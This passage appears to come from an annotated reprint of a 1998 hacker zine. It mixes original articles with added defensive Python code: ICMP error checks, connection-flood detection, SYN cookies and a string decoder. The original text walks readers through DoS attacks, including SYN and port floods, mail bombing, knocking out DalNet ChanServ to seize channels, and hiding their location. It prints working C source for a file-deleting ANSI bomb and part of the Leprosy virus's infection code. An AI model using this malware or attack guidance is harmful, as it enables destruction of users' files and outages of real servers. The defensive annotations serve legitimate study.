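    return struct.pack("!BBHI", ICMP_DEST_UNREACH, code, csum, 0) + quoted


def classify_icmp_error(pkt, local_ip, connections):
    """Decide what a host should do with an ICMP error message.

    connections maps (local_ip, local_port, remote_ip, remote_port) to the
    (snd_una, snd_nxt) send window of a live TCP connection."""
    if len(pkt) < 8 + 20 + 8:
        return "ignore: truncated"
    if inet_checksum(pkt) != 0:
        return "ignore: bad checksum"
    itype, code = pkt[0], pkt[1]
    if itype != ICMP_DEST_UNREACH:
        return "ignore: not destination unreachable"
    inner = pkt[8:]                        # the quoted original datagram
    ihl = (inner[0] & 0x0F) * 4
    if len(inner) < ihl + 8:
        return "ignore: truncated"
    if inner[9] != 6:
        return "ignore: quoted datagram is not TCP"
    src = socket.inet_ntoa(inner[12:16])
    dst = socket.inet_ntoa(inner[16:20])
    sport, dport, seq = struct.unpack("!HHI", inner[ihl:ihl + 8])
    # The quoted datagram must be one this host actually sent: our address as
    # source and a four-tuple that belongs to a live connection.
    window = connections.get((src, sport, dst, dport))
    if src != local_ip or window is None:
        return "ignore: no matching connection"
    # RFC 5927 check: the quoted sequence number must lie inside the data in
    # flight, which a blind forger cannot know (sequence wraparound ignored).
    snd_una, snd_nxt = window
    if not snd_una <= seq < snd_nxt:
        return "ignore: sequence number outside send window"
    return "hard: abort connection" if code in HARD_CODES else "soft: log only"


LOCAL_IP, REMOTE_IP = "192.0.2.10", "198.51.100.5"
# One live connection to an IRC port, with 500 bytes unacknowledged (constructed).
CONNECTIONS = {(LOCAL_IP, 40000, REMOTE_IP, 6667): (1000, 1500)}
```

A forger who knows only your address and the server you are talking to can produce a packet that passes the checksum but fails the four-tuple or sequence check, which is the whole point: each check removes something an off-path attacker would have to guess. The same structure applies to the other message types in the list above; only the final hard/soft decision differs.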
The most modern type of net attack is fragmentation. This can be used on most systems quite easily. It is a new attack and is still not used that widely.
Essentially this attack revolves around IP data packets. Whenever a computer sets up a net connection, it uses data packets to communicate with other computers on the net. This attack sends data packets to a computer that are deliberately fragmented. The packets are incomplete in their content. The computer that receives the fragmented packets sets up a routine to listen for the rest of the packets, while the attack stops sending those packets and starts to send another thread of fragmented packets. As the number of threads builds, the computer under attack slows down and will eventually crash or drop the net connection.
Coding a program to do this would require a high degree of programming knowledge. On a UNIX machine, you will need to have root access to run an attack like this because you will need to have raw access to the ports. You will need to code in a low level language for a Windows machine. You will also need to develop some means of optimisation that allows you to set up multiple threads to speed up the attack.
This attack should be effective on most operating systems. Although some protections have been set up on some systems, most of them are still susceptible. Even ones that have protection should be vulnerable. While some systems will buckle faster than others, they will all buckle soon enough as long as you maintain the attack for long enough and your connection is fast enough.
While this isn't always considered a denial of service attack, I decided to include it in this file as it can be used as a very effective DoS attack. While mail bombing is usually only used as a form of revenge or retribution, it can be used to crash a server in order to run a successful denial attack.
If you wanted to crash a server, you might find in your research that it handles the SMTP protocol. This would open up the possibilities of mail bombing the server. If you were to bomb the target computer with a huge amount of mail messages, you might be able to flood the computer and choke up its hard drive space. The more space you take up, the more lagged the server will become and if you keep up your attack you will eventually cause the computer to crash due to lack of HD space.
There isn't really any way of protecting against a mail bomb attack. If your computer needs to have mail capabilities, you can't close the mail ports. It is possible to set up a mail buffer to try and catch the attack. All operating systems are vulnerable to an attack of this sort. But more modern systems are set up in more advanced ways in order to catch possible attacks, but no way is perfectly secure.
All operating systems have been found to contain security holes. Some of these holes cause only annoyances; others are serious flaws in the system that can cause it to crash or freeze. If you are aware of the system that you are attacking, then you will be able to find a hole in that system to exploit.
Windows NT is one of the most modern server software packages that has been released. It can turn a normal computer into an Internet Server. This drastic upgrade means that it has become very popular among small companies that need to run a low cost server on the net. It has several very well documented holes that can be used against it.
Certain UNIX routines are known to contain flaws that can be exploited without actually having access to the server. They can be accessed over the Internet, making an attack very easy. Certain daemons such as sendmail are widely known to contain flaws in their programming. Searching for these exploits would give you the direct capabilities to attack the server.
Research over the net would be the best way to find exploits for specific systems. While most DoS attacks are general attacks, that need to be directed at a certain OS, some are unique and these need to be researched.
Port flooding is when your attack centres around flooding a certain port with multiple connections. This attack floods a port with so many connections that the target computer is so severely lagged that it starts to drop its other connections.
UNIX machines have a process table that contains a list of all the programs that are currently running on the machine. If you were to flood the process table with dozens of invocations of a specific program, you would start to slow the server response time down. For instance, if your attack were to make multiple connections to port 25 on a UNIX machine, you would flood the process table with lots of invocations of the sendmail program. This would soon start to disconnect other connections, and as the other programs die off, the attack would flood the free space, meaning the computer wouldn't be able to host any more connections or internal programs.
A port flooding program can very easily be written. It would connect to the target computer with as many connections as your computer can handle. You would need to maintain the flooding for as long as the attack was necessary. If the program was starting sendmail routines, it would simply connect to the target computer on port 25 and then hold the connection without sending any data. The attack would hold the connection until the target computer cut you off.
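From the server side, the flood just described has a recognisable shape in the connection table: one remote address holding many idle sessions on one port, with the daemon forked once per session. The following Python is an added example, not from the article, that reads netstat-style output and flags that concentration, and separately counts half-open (SYN_RECV) handshakes per port, which is the shape the SYN flood described further down leaves behind. The sample output and the thresholds are constructed.

```python
from collections import Counter


def constructed_netstat():
    """Constructed 'netstat -tn'-style output (not a real capture): one source
    holds 24 idle connections to port 25, five ordinary clients sit on port 80,
    and three half-open handshakes are parked in SYN_RECV."""
    lines = ["Proto Recv-Q Send-Q Local Address      Foreign Address      State"]
    lines += ["tcp        0      0 192.0.2.1:25       198.51.100.20:%d  ESTABLISHED" % (40000 + i)
              for i in range(24)]
    lines += ["tcp        0      0 192.0.2.1:80       203.0.113.%d:51000    ESTABLISHED" % i
              for i in range(1, 6)]
    lines += ["tcp        0      0 192.0.2.1:80       198.51.100.77:%d  SYN_RECV" % (45000 + i)
              for i in range(3)]
    return "\n".join(lines)


def parse_netstat(text):
    """Parse rows into (local_port, remote_ip, state) tuples; the header line
    and non-TCP rows are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp"):
            continue
        _local_ip, local_port = parts[3].rsplit(":", 1)
        remote_ip, _remote_port = parts[4].rsplit(":", 1)
        rows.append((int(local_port), remote_ip, parts[5]))
    return rows


def find_floods(rows, per_source_limit=20, half_open_limit=100):
    """Two views of the same table: established connections concentrated on one
    (source, port) pair, and half-open handshakes per listening port."""
    per_source = Counter((remote_ip, port) for port, remote_ip, state in rows
                         if state == "ESTABLISHED")
    half_open = Counter(port for port, _ip, state in rows if state == "SYN_RECV")
    hogs = {k: n for k, n in per_source.items() if n >= per_source_limit}
    syn_backlog = {p: n for p, n in half_open.items() if n >= half_open_limit}
    return hogs, syn_backlog


if __name__ == "__main__":
    hogs, backlog = find_floods(parse_netstat(constructed_netstat()), half_open_limit=3)
    for (ip, port), n in hogs.items():
        print("source %s holds %d connections to port %d" % (ip, n, port))
    for port, n in backlog.items():
        print("port %d has %d half-open connections" % (port, n))
```

The per-source count is the actionable one for a sendmail-style flood: a mail server has no reason to accept dozens of simultaneous idle sessions from one peer, so a per-client connection cap (which sendmail and inetd-style wrappers can enforce) closes the gap the article describes.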
The SYN - ACK protocol is a 3-way handshake for setting up Internet connections. A computer sends a SYN packet to the server. The server receives the SYN and responds with an ACK packet. The connection is now set up and running.
The SYN flooding attack is based on an incomplete handshake. The attacker sends a SYN packet from his computer to the server under attack. The server responds with an ACK packet to acknowledge the connection. Then the attack simply sends another SYN packet and waits for the server to respond. By flooding the server with connections that don't actually send any information, you will start to lag it and perhaps even crash it. The Internet stack will wait a certain amount of time before dropping the connection, so a SYN flooding attack keeps setting up connections faster than the computer under attack can drop them, and by doing so can crash the server quite easily.
There is no real way of securing a server from this type of attack. The problem lies in the fact that the SYN - ACK connection is a necessary protocol for a net server. Without it, it would be severely restricted in its on-line transactions. But by restricting the number of possible connections at any one time, you drastically reduce the chance of there being a problem.
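A stateless defence did exist when this was written: SYN cookies, proposed by D. J. Bernstein in 1996, are what servers use today. The server encodes a keyed hash of the 4-tuple, the client's initial sequence number and a coarse time slot into the sequence number it sends in the SYN-ACK, keeps no record of the half-open connection, and only allocates state when the final ACK echoes a cookie it can verify. An attacker who never completes the handshake therefore costs the server nothing to remember. The Python below is an added example, not from the article: both sides of the exchange are written out, the secret, addresses and MSS table are constructed, and the layout follows the Linux scheme (8 bits of time slot, 24 bits of MAC plus MSS index added to the client's ISN) in simplified form.

```python
import hashlib
import hmac
import socket
import struct

# Constructed server secret; a real implementation rotates it periodically.
SERVER_SECRET = b"constructed-demo-secret"
COOKIE_PERIOD = 64          # seconds per time slot
# The cookie carries an index into this table so the server can recover the
# client's MSS from the final ACK without having stored the SYN.
MSS_TABLE = [536, 1220, 1460, 4312]


def _time_slot(now):
    return int(now) // COOKIE_PERIOD


def _mac24(src_ip, dst_ip, sport, dport, client_isn, slot):
    """24-bit keyed hash over the 4-tuple, the client's ISN and the time slot."""
    msg = struct.pack("!4s4sHHII", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                      sport, dport, client_isn, slot & 0xFFFFFFFF)
    digest = hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_syn_cookie(src_ip, dst_ip, sport, dport, client_isn, mss, now):
    """Server side, on SYN: compute the ISN for the SYN-ACK and store nothing.
    Layout: [8 bits time slot][24 bits MAC + MSS index], added to the client ISN."""
    slot = _time_slot(now)
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    low24 = (_mac24(src_ip, dst_ip, sport, dport, client_isn, slot) + mss_idx) & 0xFFFFFF
    return (client_isn + ((slot & 0xFF) << 24) + low24) & 0xFFFFFFFF


def check_syn_cookie(src_ip, dst_ip, sport, dport, client_isn, cookie, now):
    """Server side, on the final ACK: cookie is ack_number - 1. Accept cookies
    issued in the current or previous slot; return the recovered MSS or None."""
    now_slot = _time_slot(now)
    for slot in (now_slot, now_slot - 1):
        rest = (cookie - client_isn - ((slot & 0xFF) << 24)) & 0xFFFFFFFF
        if rest >> 24:          # time-slot byte does not match this candidate
            continue
        mss_idx = (rest - _mac24(src_ip, dst_ip, sport, dport, client_isn, slot)) & 0xFFFFFF
        if mss_idx < len(MSS_TABLE):
            return MSS_TABLE[mss_idx]
    return None


def handshake(src_ip, dst_ip, sport, dport, client_isn, mss, now, complete=True):
    """Both sides of the exchange. Returns the MSS the server recovers from the
    ACK, or None if the client never answers (a flood source) or the ACK is bad."""
    # 1. client -> server: SYN, seq = client_isn
    cookie = make_syn_cookie(src_ip, dst_ip, sport, dport, client_isn, mss, now)
    # 2. server -> client: SYN-ACK, seq = cookie, ack = client_isn + 1; no state kept
    if not complete:
        return None     # nothing was allocated, so nothing has to time out
    # 3. client -> server: ACK, seq = client_isn + 1, ack = cookie + 1
    ack = (cookie + 1) & 0xFFFFFFFF
    return check_syn_cookie(src_ip, dst_ip, sport, dport, client_isn,
                            (ack - 1) & 0xFFFFFFFF, now + 1)


if __name__ == "__main__":
    print(handshake("203.0.113.5", "192.0.2.1", 51000, 80, 123456, 1460, 1_000_000))  # 1460
    print(handshake("203.0.113.5", "192.0.2.1", 51000, 80, 123456, 1460, 1_000_000,
                    complete=False))  # None
```

The price of statelessness is that TCP options from the SYN other than the MSS are lost, which is why real stacks only switch to cookies once the backlog fills, and a cookie replayed within its two-slot lifetime from the same 4-tuple is accepted, so the secret must be unguessable and rotated.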
There are certain services that are available only on specific servers that you may need to attack. If the service is unique enough you may have some difficulty actually attacking it. One example is the services.dal.net server. It runs the services that are provided for the DalNet IRC network. ChanServ, MemoServ and NickServ are very unique services that are run from this server. These services can be accessed from anywhere on the DalNet IRC network. Hundreds of connections are consistently connected to DalNet and all these people are using the DalNet services repeatedly. To take over an IRC channel on DalNet you might want to shut down ChanServ. To do that you would need to research the service and find a hole in it that you can exploit. You may be able to research a little to find software similar to it that has some exploits already documented.
Most DoS attacks are run from your own computer. Unless you want a pesky system administrator ringing you the next day, you will need to find some way to hide your location from the target computer that you are attacking.
IP spoofing is the hardest thing that can be done these days in the world of hacking. There are several ways to hide your location from the log files on a target computer. Some are more appropriate than others because of their advantages and disadvantages.
Wingating is the most widely used bounce technique. It involves connecting to a computer that is running the Wingate program, so you can then bounce off that computer and route your connection to another computer. This isn't really a choice for DoS attacks, because these attacks usually rely on speed. Wingate systems are slow and lagged on their own, and your added connection won't help.
IP packet spoofing is the next possibility. It involves creating an attack that actually sends packets of data that spoof the original IP address. This can't be achieved in a Windows environment, because Windows controls too much of the net interface. It is much easier to accomplish on a UNIX machine, as when you are programming you can have access to the raw sockets. As you can specify exactly what you want to send to the network output, you can choose exactly the information to send out. You can even send a specific IP address that you wish the packets to seem to come from.
All you need to make a successful attack is a little information on the server. You should probably try to log onto the server as a Guest account and try to gain as much information as you can. You will need to have the operating system information and a list of the software running internally or on the ports of the server. Search for techniques to exploit the server and its software.
Once you have the necessary information or utilities you can attack the server. You will probably want to choose a time for the attack that would be good for your net connection: a time that your ISP won't be too bogged down with connections, and also a time that the net won't be flooded with users. The more relaxed the Internet is, the faster your connection will be and the faster your attack will go. You need to select a time that will allow you to have enough time on-line to complete the attack and go ahead with whatever you intend to do after the server drops.
There are lots of websites that discuss server exploits and software holes. You can search for information on the software and you should be able to find the necessary techniques and information for attacking the server. Here are a few:
- http://www.rootshell.com
- http://www.cdc.com
- http://www.warforge.com
Also check out my site http://homepages.iol.ie/~cronus for updates.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 7 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Interview with Neonsurge:
What are your main underground interests ?
NeonSurge : WindowsNT Security (anything affecting Microsoft Products
really). New Crypto mechanisms are always of interest. And corporate
espionage and sabotage is neat.
How long have you been involved in that activity ?
NeonSurge : Since 1984
How did you get involved in the net underground ?
NeonSurge : That's a really long story. It started locally for me in my
hometown a long time ago. At the time, the net wasn't really much...
Everything was text based and not as pretty (that's a joke). At the time
private BBS and VMB's were the big thing. You would get updates as to
the new shit to try via listening to other people's VMB's. At that time
my stomping ground was SprintNet (x.25). From there it was a natural
progression to what I do today I suppose.
How did you learn ?
NeonSurge : Reading. Playing. Reading. Reading. Reading. Playing.
What advice would you have for a beginner in the underground ?
NeonSurge : See Above.
Do you feel that the underground community has evolved in a good
or bad way ?
NeonSurge : For the most part I think it has evolved in a bad way. No
one really shares information anymore, which is a sad thing.
The only good way in which the scene has evolved is the availability
of the information that is shared.
Do you wish to publicly admit any criminal activities relating
to the net ?
NeonSurge : No. Not at this time, thanks...
Is there anything you would like to pass on to the net community ?
NeonSurge : Don't be stupid. Don't be afraid to learn new technologies,
Unix and Linux are not everything.
Do you have anything you would like to add ? A quote perhaps ?
NeonSurge : Don't eat the big white mints.
Contact Information ?
neonsurge@hotmail.com
http://rhino9.ml.org
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 8 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Mixed Up Underground:
Hacking as we know it is very mixed up. There are so many people trying to
be hackers [I'm going to refrain from the word wannabe] that only some make
it to that goal. The rest get lost somewhere in the void between. The best
way to stop hacking is never to start. Hacking isn't a bad thing. But it's a
commitment. Like having a family or something. My best advice to newbies is
not to try to learn how to "hack". I suggest learning about computers. Have
fun with them. Set up a network. Use Windows for all I care. For all anyone
cares. Those who say the first step to becoming a hacker is setting up
Linux are stupid. They should be thrown out to the dogs. Most newbies don't
even know what UNIX is and trying to explain that Linux is a version of
UNIX written by Linus Torvalds originally from a modified form of Minix and
that it runs on Intel based home computers with a partition which allows
multiple operating systems is pushing it. Woah. If a newbie understands
that then they should go work for NASA and help return our glorious urge
for space exploration back to what it used to be.
In my opinion, if a person feels the need to become a hacker or push their
computer to the extreme then they should do just that. Push their COMPUTER
to the extreme. Not rack their brains for hours on end and eventually wind
up in that void I talked about earlier. Hacking is about getting into
computers...hmm..so if you know a lot about your own computer then
maybe...just maybe it makes it possible for you to get into another
computer. There's a thought. Then you don't have to read all those hyped
technical manuals that you get bored reading. Instead you can have fun and
do things. Sounds better to me.
This is not a guide "how to hack" if you don't already know. I plan to write
a page about how the hacking society has turned into something like the US
Government which hackers supposedly dislike. Why? Because it's corrupt and
power-hungry. In the end all things made by humans or used by humans or
organised by humans turn into something like that. So forget listening to
others. Do things your way. If you don't want to read this text or that or
set up Linux, then don't. There are no requirements for being a hacker. If
there were then I'm sure that the hacker society would go form a new
country and label it "copy of the US Gov." But no. It hasn't got that bad
yet. So learn while you can. Maybe it will help you out in life. Or maybe
you will end up in the cage with murderers and rapists. I dunno. Would that
be fun? That's what happens if you try too hard to learn too fast. So back to
the original idea of just losing the generally thought idea of how to hack
and just learning computers.
If you really want some quick tips on becoming a hacker in non-conventional
ways then here they are. Get like 2 or 3 computers. Windows is fine. They
can be cheap ones. Then read up on networking. Maybe set up a TCP-IP
network between these three computers. Then access one of these other
computers from DOS. Well good. You have knowledge of TCP-IP [the basis of
the internet], DOS [how many million lines of UNIX code are in DOS??], and
some lovely problem solving skills. There. You know some good stuff now!
Maybe you want to add to your home network. Add some interesting things
here and there and try them out. You can learn more every day. Maybe you
want to try to put a Macintosh on your network. Hmm...Read up on it. Talk
to some people. Once you have that then you are quite knowledgeable! What
next? Maybe some UNIX variant. By now you have heard about it. The free
operating system [Linux] which you can put on an old 486 and hook up to
your network too. There. Unix, Mac, TCP-IP, Windows, Problem Solving,
Hardware skills. All lumped together. Then maybe, just maybe you want to
host your very own networking help website on your very own network. Set up
a server, and get a domain name and configure, configure, configure. That
definitely adds to your knowledge! Fun. Now you know a whole bunch about
hacking [you didn't even know it?] without having to go to ONE site with
those flaming skulls. Good for you.
I hope this text has made you think. It sure made me. All my ideas and
anger on paper [what SHOULD I call it?] and enough information to get you
in action. I haven't said once that you have to do anything. And you don't.
Just go your own route. The network I talked about WOULD help you out. And
it would be fun to build [and have]. So make your own decisions and keep
thinking!
-Digital Avatar 9.23.98
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 9 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Virii--Shit:
A Virus Information Text File
By Kleptic
CREDITS:
-------------------------------------------------------------
Author............................................Kleptic <tm>
Editor............................................Kleptic <tm>
Ideas, Source, Examples Supplied By...............Kleptic <tm>
Facts Stolen From Several Sources By..............Kleptic <tm>
-------------------------------------------------------------
Introduction:
Welcome to my really long text file on Virus information and safety.
I have always had a fascination with computer virii, since I first heard the
word. I, like a lot of people, had no idea what they were about, and was
extremely curious. And this text file will cover my process as I find out
more about them. How they are written, why they act like they do, and if
possible, why people would write them.
In This File:
Prevention And Protection Methods
The "Internet Worm"
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
Benign VS Malignant Virii
Sample Source Code Of Virii
Discussion Of The Infection And Encryption Methods Used By "Leprosy"
The "Uncompress" Virus
"Suicidal Tendencies" Department/Virus Of The Month
Discussion Of Anti Viral Software
Things You Should Know
-----------------------------------------------------------------------------
Prevention And Protection Methods:
-----------------------------------------------------------------------------
After the infamous "Michelangelo" panic, I realised what the masses are
lacking is virus literacy. If people had an understanding of them, and knew
the appropriate methods of prevention, and dealing with an infection, the
situation would've never been blown out of proportion like it was. When I
hear people ask questions such as "If I Put My Toothbrush Near An Infected
Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok,
maybe that example is a little exaggerated, but some of the questions are
hitting close to that level of stupidity, so here are some protection and
prevention methods:
1. If you download a file from a public BBS, or a friend gives you a file
that he downloaded from somewhere, be sure and uncompress the file onto
a floppy and run your virus scanner on it. NEVER run a new file without
checking it first. Some people believe a virus scanner can spot a file
that is infected within a compressed file by running the virus scanner
on it, this is NOT true. You have to decompress the file first.
By doing this, you are dropping your chances of infection considerably
BUT there is always the chance of an unknown virus that the scanner won't
spot so that is why you have to ALWAYS have a backup of all your data on
tape or disk. That way if the unknown virus wipes your hard drive, you
have the backup and nothing is lost.
2. In the event of a virus infection, shut your computer off immediately and
wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some
virii can survive through a warm boot. Always do a "cold boot" (Shut the
computer OFF). After the 10-20 seconds, boot your computer from a CLEAN
WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from
a WRITE PROTECTED disk. (The reason for having the disks write protected
is just in case the virus is still lurking around, it won't be able to
write itself and infect the floppies). If the virus is a known one, have
the virus scanner either fix the infected files, or delete them (and
replace from your backup) or make a note of the infected files and erase
them manually.
3. How do you spot an attack by an unknown virus?
A) Change in sizes of files
B) Change of file dates/times
C) Deleted files
D) Slower processing time
E) Unusual messages
F) Disk activity, more than usual (Writing to the disk when it's not
necessary)
4. What to do in the event of an unknown virus attack?
A) Follow steps of shutting machine off and re-booting as outlined in
#2
B) Run your virus scanner and have it look for files that changed in
size or date (if your scanner has a feature that makes note of
original virus sizes/dates/times)
C) If your virus scanner doesn't make note of original sizes/dates/times
you can always make note of them manually and then check them yourself.
It's time consuming, but can prevent serious damage to your data, and
you should try to isolate an infected file and send it to ME (info on
how to get it to me at the end of the newsletter) so I can attempt to
dissect it and notify the appropriate person of the new virus.
D) Some virus scanners come with a TSR that will prevent any writing to
disk, it will pop a window or message on the screen saying: Attempting
to write to <filename> Do you wish to do so? If something is trying to
write to a file that shouldn't be written to at that time, chances are
you are dealing with an unknown virus and should say no. Then try to
find and isolate the virus.
E) How do you spot an unknown virus or a known virus without running
a virus scanner?
1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority
of them are .COM files so if you have, let's say, a 6K .COM file
that claims to be an "awesome game" I'd be a little bit suspicious.
2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over
the years I have run into files named that, when people tried to
infect my computer. At least they could've named it something else
not so obvious.
3) As stated in #1, the MAJORITY of them are small .COM files but they
can be .EXE files as well, and bigger than 10K.
All it takes is a little bit of common sense, and 99% of what could've been
virus attacks on your computer can be prevented. All you have to remember is
that they cannot infect your machine unless run first...BUT there is one
virus out there that, when uncompressed, activates itself. This virus does
NOT have to be executed in order to infect your machine, and it will be
discussed later on. In the event of where this "uncompress" virus wipes some
of your data, or any other virus, that's what backups are for. ALWAYS HAVE A
BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a
program when there is a virus in memory because, chances are, that floppy
will get ruined/infected as well, unless it is write protected. The instant
you are aware of an infection, shut the machine off! Because there are some
virii that, upon finding a write protected floppy that it cannot infect, or
something else it can't do, "get mad" and cause destruction.
-----------------------------------------------------------------------------
The "Internet Worm"
-----------------------------------------------------------------------------
This has to be the most widely publicised case of a virus attack ever.
On 10/02/88, Robert Morris, a graduate student, wrote and released a worm
that infected "Internet" the world-wide network. Within hours, it infected
thousands of computers. The worm was benign, not causing any damage to files
or media, but replicated itself over and over rapidly, and resulted in the
computers on Internet having to be shut down and all copies of the worm
removed. Some of the hosts were still disconnected from the network eight
days later, showing the impact this worm had. Morris claimed he did it as an
experiment, and made a mistake in how fast it actually would replicate. The
media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm
front page coverage. On November 4th, teams at several institutions went to
work and successfully "decompiled" the worm and studied it in the language it
was written in, "C language", but the source code was never released for fear
of hackers using the source for malicious purposes. In the end, Morris was
removed from school, ordered to pay $10,000 in fines, perform 400 hours of
community services and was on 3 years probation. Some people argued as to
whether or not Morris was guilty because he evidently didn't do it to cause
damage, but rather as an experiment that went wrong.
What the worm did: It hacked its way into hosts attached to the internet by
cracking passwords and then replicated itself rapidly, taking up all the
memory and forcing the hosts to be shut down.
-----------------------------------------------------------------------------
Trojans, Worms, Virii, Ansi Bombs: What's the difference?
-----------------------------------------------------------------------------
Trojans: Programs disguised as a useful program or an existing real program
that can cause damage on your system.
Worms: Benign virii, rarely causing damage to media or files, such as the
Internet worm.
Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys,
when pressed, to do other things.
Example: If an Ansi bomb was in memory, and it remapped the "K" key to erase
all the files in the current directory, as soon as you pressed K
the files would be gone. Usually when you type C>ERASE *.*
MS-DOS will respond with: All the files in the current directory
will be deleted! Are you sure (y/n)?
Some Ansi bombs are intelligent and can prevent such DOS messages
from appearing.
-----------------------------------------------------------------------------
Here is the source code to a simple Ansi bomb:
-----------------------------------------------------------------------------
#include <stdio.h>
#define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S)
#define F1 59
#define F2 60
#define F3 61
#define F4 62
main()
{
KILL(F1, "DEL *.ZIP");
KILL(F2, "DEL *.ARJ");
KILL(F3, "DEL *.COM");
KILL(F4, "DEL *.EXE");
}
-----------------------------------------------------------------------------
This just assigns the string (DEL *.ZIP etc) to the respective keys. If this
Ansi bomb was in memory, and you pressed F1, it would delete all the files
in the current directory with the extension of .ZIP. The command (DEL *.ZIP)
would appear on the screen though, and you could use a file recovery program
to recover the deleted files. There are more lethal Ansi bombs, ones that can
format your hard drive and other such destructive acts.
Prevention: Use NANSI or ZANSI rather than ANSI and the Ansi bombs won't work.
-----------------------------------------------------------------------------
Virii: Destructive programs that use 'stealth' techniques, and can replicate.
Not All virii are destructive, some can be benign, and just pop up
annoying messages time to time or slow down system speed.
-----------------------------------------------------------------------------
No more will be discussed of ANSI Bombs or Trojans as this newsletter is
dedicated entirely to virii.
-----------------------------------------------------------------------------
Benign VS Malignant Virii:
-----------------------------------------------------------------------------
Benign Virii do not cause damage but do things such as take up all the memory,
slow processing speed down, and send annoying messages to the console, or the
printer, etc...
Malignant, or Malicious, Virii cause actual destruction, deleting files,
destroying the FAT or boot sector, locking up the computer, formatting disks
or hard drives, etc...
-----------------------------------------------------------------------------
Virus Source Code:
-----------------------------------------------------------------------------
Now for the real thing, we will start with the C Language source code to the
"Leprosy" Virus.
-----------------------------------------------------------------------------
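The message tables at the top of the listing below are stored with every byte offset by 10, and print_s() subtracts 10 from each byte just before handing the string to DOS (INT 21h, AH=09h, which prints up to a '$' terminator). Reversing that offset is the first thing an analyst does with a sample like this, because it reveals what the program prints without running it. The following Python is an added helper, not part of Kleptic's file or of the virus source: the byte strings are copied from the listing (the CRLF macro, "\x17\x14", prepended as the C compiler concatenates it), and the decode is the inverse of print_s().

```python
# Byte strings copied from the char tables at the top of the listing below,
# with the CRLF macro ("\x17\x14") prepended as in the C source.
ENCODED = {
    "fake_msg": b"\x17\x14Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.",
    "virus_msg[0]": b"\x17\x14\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
    "virus_msg[1]": b"\x17\x14\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
    "virus_msg[2]": b"\x17\x14\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14.",
}


def decode_leprosy_string(data, shift=10):
    """Undo print_s(): subtract the shift from every byte. The trailing '.'
    (0x2E) becomes '$' (0x24), the terminator DOS INT 21h/AH=09h stops at."""
    return bytes((b - shift) & 0xFF for b in data)


def decoded_messages(encoded=ENCODED):
    """Return each table entry as readable text, with the '$' terminator and
    the surrounding CR/LF/tab control bytes removed."""
    out = {}
    for name, enc in encoded.items():
        plain = decode_leprosy_string(enc).decode("ascii")
        out[name] = plain.rstrip("$").strip()
    return out


if __name__ == "__main__":
    for name, text in decoded_messages().items():
        print("%-13s %s" % (name, text))
```

The decoded fake_msg is a plausible DOS error line, which is the "low profile" main() refers to; the three virus_msg lines are the payload's announcement. A constant-offset encoding like this also explains why a scanner matching on the plaintext strings would miss the file while the first 20 bytes of code (what healthy() compares) still identify it.
-----------------------------------------------------------------------------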
#pragma inline
#define CRLF "\x17\x14" /* CR/LF combo encrypted. */
#define NO_MATCH 0x12 /* No match in wildcard search. */
char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
char *virus_msg[3] =
{
CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.",
CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.",
CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14."
};
struct _dta /* Disk Transfer Area format for find. */
{
char findnext[21];
char attribute;
int timestamp;
int datestamp;
long filesize;
char filename[13];
} *dta = (struct _dta *) 0x80; /* Set it to default DTA. */
const char filler[] = "XX"; /* Pad file length to 666 bytes. */
const char *codestart = (char *) 0x100; /* Memory where virus code begins. */
const int virus_size = 666; /* The size in bytes of the virus code. */
const int infection_rate = 4; /* How many files to infect per run. */
char compare_buf[20]; /* Load program here to test infection. */
int handle; /* The current file handle being used. */
int datestamp, timestamp; /* Store original date and time here. */
char diseased_count = 0; /* How many infected files found so far. */
char success = 0; /* How many infected this run. */
/* The following are function prototypes, in keeping with ANSI */
/* Standard C, for the support functions of this program. */
int find_first( char *fn );
int find_healthy( void );
int find_next( void );
int healthy( void );
void infect( void );
void close_handle( void );
void open_handle( char *fn );
void print_s( char *s );
void restore_timestamp( void );

/*----------------------------------*/
/*       M A I N   P R O G R A M    */
/*----------------------------------*/

int main( void ) {
    int x = 0;

    do {
        if ( find_healthy() ) {          /* Is there an un-infected file? */
            infect();                    /* Well, then infect it! */
            x++;                         /* Add one to the counter. */
            success++;                   /* Carve a notch in our belt. */
        }
        else {                           /* If there ain't a file here... */
            _DX = (int) "..";            /* See if we can step back to */
            _AH = 0x3b;                  /* the parent directory, and try */
            asm int 21H;                 /* there. */
            x++;                         /* Increment the counter anyway, to */
        }                                /* avoid infinite loops. */
    } while( x < infection_rate );       /* Do this until we've had enough. */

